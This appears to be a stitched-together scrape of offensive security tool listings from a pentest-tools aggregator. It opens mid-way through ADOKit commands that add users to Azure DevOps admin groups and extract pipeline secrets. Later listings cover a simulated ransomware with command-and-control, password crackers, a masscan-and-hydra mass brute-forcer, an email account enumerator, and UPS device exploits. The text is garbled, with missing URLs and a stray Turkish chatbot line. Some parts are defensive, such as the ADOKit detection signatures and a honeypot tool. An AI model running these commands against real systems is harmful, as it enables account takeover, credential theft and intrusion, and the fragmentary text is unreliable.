ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 4:04:40 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | | John Smith
[YourOrganization]\Project Collection Administrators | | User 1

4/4/23 20:04:43 Finished execution of addcollectionadmin

Remove Collection Admin

Use Case

Remove a user from the Project Collection Administrators group.


Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionadmin /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 4:10:35 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | | John Smith

4/4/23 20:10:38 Finished execution of removecollectionadmin

Add Collection Build Admin

Use Case

Add a user to the Project Collection Build Administrators group.


Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildadmin /credential:apiKey /url: /user:"someUser"

ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:21:39 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | | User 1

4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

Remove Collection Build Admin

Use Case

Remove a user from the Project Collection Build Administrators group.


Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildadmin /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:21:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

Add Collection Build Service Account

Use Case

Add a user to the Project Collection Build Service Accounts group.


Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:22:13 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | | User 1

4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

Remove Collection Build Service Account

Use Case

Remove a user from the Project Collection Build Service Accounts group.


Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:22:27 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

Add Collection Service Account

Use Case

Add a user to the Project Collection Service Accounts group.


Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 11:21:01 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | | John Smith
[YourOrganization]\Project Collection Service Accounts | | User 1

4/5/23 15:21:04 Finished execution of addcollectionsvc

Remove Collection Service Account

Use Case

Remove a user from the Project Collection Service Accounts group.


Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 11:21:43 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | | John Smith

4/5/23 15:21:44 Finished execution of removecollectionsvc

Get Pipeline Variables

Use Case

Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.


Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

ADOKit.exe getpipelinevars /credential:apiKey /url: /project:"someProject"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url: /project:"someProject"

ADOKit.exe getpipelinevars /credential:apiKey /url: /project:"all"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url: /project:"all"

Example Output

C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL:

Timestamp: 4/6/2023 12:08:35 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Pipeline Var Name | Pipeline Var Value
credential | P@ssw0rd123!
url | http://blah/

4/6/23 16:08:36 Finished execution of getpipelinevars

Get Pipeline Secrets

Use Case

Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.


Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

ADOKit.exe getpipelinesecrets /credential:apiKey /url: /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url: /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:apiKey /url: /project:"all"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url: /project:"all"

Example Output

C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL:

Timestamp: 4/10/2023 10:28:37 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Build Secret Name | Build Secret Value
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]

4/10/23 14:28:38 Finished execution of getpipelinesecrets

Get Service Connections

Use Case

List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.


Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

ADOKit.exe getserviceconnections /credential:apiKey /url: /project:"someProject"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url: /project:"someProject"

ADOKit.exe getserviceconnections /credential:apiKey /url: /project:"all"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url: /project:"all"

Example Output

C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL:

Timestamp: 4/11/2023 8:34:16 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Connection Name | Connection Type | ID
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

4/11/23 12:34:16 Finished execution of getserviceconnections


Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
  • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
  • Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.


  • Support for Azure DevOps Server



☐ β˜† βœ‡ KitPloit - PenTest Tools!

RansomwareSim - A Simulated Ransomware

By: Zion3R β€” January 3rd 2024 at 11:30


RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.


  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates&Delete a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key.


Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE


  • Python 3.x
  • cryptography
  • colorama


  1. Clone the repository:

    git clone
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt

ο“– My Book

Running the Control Server

  1. Open
  2. Start the server by running
  3. The server will listen for connections from RansomwareSim and the Decoder.

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in to specify the target directory and other parameters.
  3. Run to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run after the files have been encrypted.
  2. Follow the prompts to input the decryption key.


RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.


Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.


For any inquiries or further information, you can reach me through the following channels:

☐ β˜† βœ‡ KitPloit - PenTest Tools!

PassBreaker - Command-line Password Cracking Tool Developed In Python

By: Zion3R β€” December 6th 2023 at 11:30

PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.Β 


  • Wordlist-based password cracking
  • Brute force password cracking
  • Support for multiple hash algorithms
  • Optional salt value
  • Parallel processing option for faster cracking
  • Password complexity evaluation
  • Customizable minimum and maximum password length
  • Customizable character set for brute force attacks


  1. Clone the repository:

    git clone
  2. Install the required dependencies:

    pip install -r requirements.txt


python <password_hash> <wordlist_file> [--algorithm]

Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.


  • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
  • -s, --salt <salt>: Specify a salt value to use.
  • -p, --parallel: Enable parallel processing for faster cracking.
  • -c, --complexity: Evaluate password complexity before cracking.
  • -b, --brute-force: Perform a brute force attack.
  • --min-length <min_length>: Set the minimum password length for brute force attacks.
  • --max-length <max_length>: Set the maximum password length for brute force attacks.
  • --character-set <character_set>: Set the character set to use for brute force attacks.

Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım ârneği:

Usage Examples

Wordlist-based Password Cracking

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

Brute Force Attack

python 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

Password Complexity Evaluation

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

Using Salt Value

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

Parallel Processing

python 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.


This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.


Contributions are welcome! To contribute to PassBreaker, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.


If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:


PassBreaker is released under the MIT License. See LICENSE for more information.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

Mass-Bruter - Mass Bruteforce Network Protocols

By: Zion3R β€” November 26th 2023 at 11:30

Mass bruteforce network protocols


Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.

How it works

  1. Use masscan(faster than nmap) to find alive hosts with common ports from network segment.
  2. Parse ips and ports from masscan result.
  3. Craft and run hydra commands to automatically bruteforce supported network services on devices.


  • Kali linux or any preferred linux distribution
  • Python 3.10+
# Clone the repo
git clone
cd mass-bruter

# Install required tools for the script
apt update && apt install seclists masscan hydra

How To Use

Private ip range :,,

Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

Ex: masscan_192.168.0.0-16.txt

Example command:

masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 | tee ./result/masscan/masscan_test.txt

Example Resume Command:

masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

Command Options

Bruteforce Script Options: -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle) -a, --all Brute all services(Very Slow) -s, --show Show result with successful login -f, --file-path PATH The directory or file that contains masscan result [default: ./result/masscan/] --help Show this message and exit." dir="auto">
└─# python3
Usage: [OPTIONS]

Mass Bruteforce Script

-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.

Quick Bruteforce Example:

python3 -q -f ~/masscan_script.txt

Fetch cracked credentials:

python3 -s


  • Migrate with dpl4hydra
  • Optimize the code and functions
  • MultiProcessing

Any contributions are welcomed!

☐ β˜† βœ‡ KitPloit - PenTest Tools!

OSINT-Framework - OSINT Framework

By: Zion3R β€” November 25th 2023 at 11:30

OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

Please visit the framework at the link below and good hunting!


(T) - Indicates a link to a tool that must be installed and run locally
(D) - Google Dork, for more information: Google Hacking
(R) - Requires registration
(M) - Indicates a URL that contains the search term and the URL itself must be edited manually

For Update Notifications

Follow me on Twitter: @jnordine -
Watch or star the project on Github:

Suggestions, Comments, Feedback

Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on github or reach out on Twitter.

Contribute with a GitHub Pull Request

For new resources, please ensure that the site is available for public and free use.

  1. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
  • Submit pull request!
  • Thank you!

    OSINT Framework Website

    Happy Hunting!

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Holehe - Tool To Check If The Mail Is Used On Different Sites Like Twitter, Instagram And Will Retrieve Information On Sites With The Forgotten Password Function

    By: Zion3R β€” August 24th 2023 at 12:30

    Holehe Online Version


    Efficiently finding registered accounts from emails.

    Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.


    With PyPI

    pip3 install holehe

    With Github

    git clone
    cd holehe/
    python3 install

    Quick Start

    Holehe can be run from the CLI and rapidly embedded within existing python applications.

    ο“š CLI Example


    ο“ˆ Python Example

    import trio
    import httpx

    from holehe.modules.social_media.snapchat import snapchat

    async def main():
    email = ""
    out = []
    client = httpx.AsyncClient()

    await snapchat(email, client, out)

    await client.aclose()

    Module Output

    For each module, data is returned in a standard dictionary with the following json-equivalent format :

    "name": "example",
    "rateLimit": false,
    "exists": true,
    "emailrecovery": "ex****",
    "phoneNumber": "0*******78",
    "others": null
    • rateLitmit : Lets you know if you've been rate-limited.
    • exists : If an account exists for the email on that service.
    • emailrecovery : Sometimes partially obfuscated recovery emails are returned.
    • phoneNumber : Sometimes partially obfuscated recovery phone numbers are returned.
    • others : Any extra info.

    Rate limit? Change your IP.

    Maltego Transform : Holehe Maltego

    Thank you to :


    For BTC Donations : 1FHDM49QfZX6pJmhjLE5tB2K6CaTLMZpXZ

     License

    GNU General Public License v3.0

    Built for educational purposes only.


    Name Domain Method Frequent Rate Limit
    aboutme register ✘
    adobe password recovery ✘
    amazon login ✘
    amocrm register ✘
    anydo login βœ”
    archive register ✘
    armurerieauxerre register ✘
    atlassian register ✘
    axonaut register ✘
    babeshows register ✘
    badeggsonline register ✘
    biosmods register ✘
    biotechnologyforums register ✘
    bitmoji login ✘
    blablacar register βœ”
    blackworldforum register βœ”
    blip register βœ”
    blitzortung register ✘
    bluegrassrivals register ✘
    bodybuilding register ✘
    buymeacoffee register βœ”
    cambridgemt register ✘
    caringbridge register ✘
    chinaphonearena register ✘
    clashfarmer register βœ”
    codecademy register βœ”
    codeigniter register ✘
    codepen register ✘
    coroflot register ✘
    cpaelites register ✘
    cpahero register ✘
    cracked_to register βœ”
    crevado register βœ”
    deliveroo register βœ”
    demonforums register βœ”
    devrant register ✘
    diigo register ✘
    discord register ✘
    docker register ✘
    dominosfr register βœ”
    ebay login βœ”
    ello register ✘
    envato register ✘
    eventbrite login ✘
    evernote login ✘
    fanpop register ✘
    firefox register ✘
    flickr login ✘
    freelancer register ✘
    freiberg register ✘
    garmin register βœ”
    github register ✘
    google register βœ”
    gravatar other ✘
    hubspot login ✘
    imgur register βœ”
    insightly login ✘
    instagram register βœ”
    issuu register ✘
    koditv register ✘
    komoot register βœ”
    laposte register ✘
    lastfm register ✘
    lastpass register ✘
    mail_ru password recovery ✘
    mybb register ✘
    myspace register ✘
    nattyornot register ✘
    naturabuy register ✘
    ndemiccreations register ✘
    nextpvr register ✘
    nike register ✘
    nimble register ✘
    nocrm register ✘
    nutshell register ✘
    odnoklassniki password recovery ✘
    office365 other βœ”
    onlinesequencer register ✘
    parler login ✘
    patreon login βœ”
    pinterest register ✘
    pipedrive register ✘
    plurk register ✘
    pornhub register ✘
    protonmail other ✘
    quora register ✘
    rambler register ✘
    redtube register ✘
    replit register βœ”
    rocketreach register ✘
    samsung register ✘
    seoclerks register ✘
    sevencups register βœ”
    smule register βœ”
    snapchat login ✘
    soundcloud register ✘
    sporcle register ✘
    spotify register βœ”
    strava register ✘
    taringa register βœ”
    teamleader register ✘
    teamtreehouse register ✘
    tellonym register ✘
    thecardboard register ✘
    therianguide register ✘
    thevapingforum register ✘
    tumblr register ✘
    tunefind register βœ”
    twitter register ✘
    venmo register βœ”
    vivino register ✘
    voxmedia register ✘
    vrbo register ✘
    vsco register ✘
    wattpad register βœ”
    wordpress wordpress login ✘
    xing register ✘
    xnxx register βœ”
    xvideos register ✘
    yahoo login βœ”
    zoho login βœ”

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PassMute - PassMute - A Multi Featured Password Transmutation/Mutator Tool

    By: Zion3R β€” May 14th 2023 at 12:30

    This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. Also, while you doing pentesting it will be very useful tool for you to brute force the passwords!!

    How Passmute can also help to secure our passwords more?

    PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.

    The transformation rules include:

    reverse: reverses the password string

    uppercase: converts the password to uppercase letters

    lowercase: converts the password to lowercase letters

    swapcase: swaps the case of each letter in the password

    capitalize: capitalizes the first letter of the password

    leet: replaces some letters in the password with their leet equivalents

    strip: removes all whitespace characters from the password

    The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.


    git clone https://HITH-Hackerinthehouse/PassMute.git
    cd PassMute
    chmod +x

    Usage To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:

    python [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]

    Here's a brief explanation of the available options:

    -h or --help: shows the help message and exits

    -f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from

    -r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply

    -v or --verbose: prints verbose output for each password transformation

    -p (PASSWORD) or --password (PASSWORD): transforms a single password

    -o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords

    -t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)

    --max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)

    NOTE: If you are getting any error regarding argparse module then simply install the module by following command: pip install argparse


    Here are some example commands those read passwords from a file, applies two transformation rules, and saves the transformed passwords to an output file:

    Single Password transmutation: python -p HITHHack3r -r leet reverse swapcase -v -t 50

    Multiple Password transmutation: python -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt

    Here Verbose and Thread are recommended to use in case you're transmutating big files and also it depends upon your microprocessor as well, it's not required every time to use threads and verbose mode.

    Legal Disclaimer:

    You might be super excited to use this tool, we too. But here we need to confirm! Hackerinthehouse, any contributor of this project and Github won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Mimicry - Security Tool For Active Deception In Exploitation And Post-Exploitation

    By: (Unknown) β€” March 24th 2023 at 11:30

    Mimicry is a security tool developed by Chaitin Technology for active deception in exploitation and post-exploitation.

    Active deception can live migrate the attacker to the honeypot without awareness. We can achieve a higher security level at a lower cost with Active deception.

    English | δΈ­ζ–‡ζ–‡ζ‘£


    Mimicry is a security tool developed by Chaitin Technology for active deception in exploitation and post-exploitation. (4)

    Quick Start

    1. Make sure docker, docker-compose is installed correctly on the machine

    docker info
    docker-compose version

    2. Install honeypot service

    docker-compose build
    docker-compose up -d

    3. Deploy deception tool on other machines

    update config.yaml,replace ${honeypot_public_ip} to the public IP of honeypot service

    4. Perform Webshell deceiving

    ./mimicry-tools webshell -c config.yaml -t php -p webshell_path

    Advance Usage

    Tool Description
    Web-Deception Fake vulnerabilities in web applications
    Webshell-Deception live migrate webshell to the honeypot
    Shell-Deception live migrate ReverseShell/BindShell to the honeypot

    Contact Us

    1. You can make bug feedback and feature suggestions directly through GitHub Issues.
    2. You can join the discussion group on Discord .

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Thunderstorm - Modular Framework To Exploit UPS Devices

    By: (Unknown) β€” March 6th 2023 at 11:30

    Thunderstorm is a modular framework to exploit UPS devices.

    For now, only the CS-141 and NetMan 204 exploits will be available. The beta version of the framework will be released on the future.


    Thunderstorm is currently capable of exploiting the following CVE:

    • CVE-2022-47186 – Unrestricted file Upload # [CS-141]
    • CVE-2022-47187 – Cross-Site Scripting via File upload # [CS-141]
    • CVE-2022-47188 – Arbitrary local file read via file upload # [CS-141]
    • CVE-2022-47189 – Denial of Service via file upload # [CS-141]
    • CVE-2022-47190 – Remote Code Execution via file upload # [CS-141]
    • CVE-2022-47191 – Privilege Escalation via file upload # [CS-141]
    • CVE-2022-47192 – Admin password reset via file upload # [CS-141]
    • CVE-2022-47891 – Admin password reset # [NetMan 204]
    • CVE-2022-47892 – Sensitive Information Disclosure # [NetMan 204]
    • CVE-2022-47893 – Remote Code Execution via file upload # [NetMan 204]


    • Python 3
    • Install requirements.txt


    It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

    git clone

    Also, you probably need to download the original and the custom firmware. You can download all requirements from here:


    - To be disclosed

    The detailed guide of use can be found at the following link:

    • To be disclosed


    This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

    Credits and Acknowledgments

    This tool has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec


    This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

    For more information, you can find me on Twitter as @JoelGMSec and on my blog

    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    X-force - IBM Security Utilitary Library In Python. Search And Query All Sources: Threat_Activities And Groups, Malware_Analysis, Industries

    By: (Unknown) β€” March 4th 2023 at 11:30

    IBM Security X-FORCE ExchangeΒ libraryΒ in Python 3. Search: threat_activities, threat_groups, malware_analysis, collector and industries.


    pip3 install XForce


    Using you API_KEY make a basic authentication. After make a base64 code β†’ Key + : + Password:

    printf "d2f5f0f9-2995-42c6-b1dd-4c92252da129:06c41d5e-0604-4c7c-a599-300c367d2090" | base64

    Using API_KEY, call functions.

    Call functions

    Threat activity search return in string XForce.threat_activities(Term, API_KEY) # Malware analysis search return in string XForce.malware_analysis(Term, API_KEY) # Threat groups search return in string XForce.threat_groups(Term, API_KEY) # Industries search return in string, API_KEY) # All categories search return in list with dict, API_KEY)" dir="auto">
    import XForce

    # Args: 1 - Term of search, 2 - API KEY

    # Threat activity search return in string
    XForce.threat_activities(Term, API_KEY)

    # Malware analysis search return in string
    XForce.malware_analysis(Term, API_KEY)

    # Threat groups search return in string
    XForce.threat_groups(Term, API_KEY)

    # Industries search return in string, API_KEY)

    # All categories search return in list with dict, API_KEY)

    For see more details of consult, run:

    from XForce import details

    # Args: 1 - GUID, 2 - API KEY
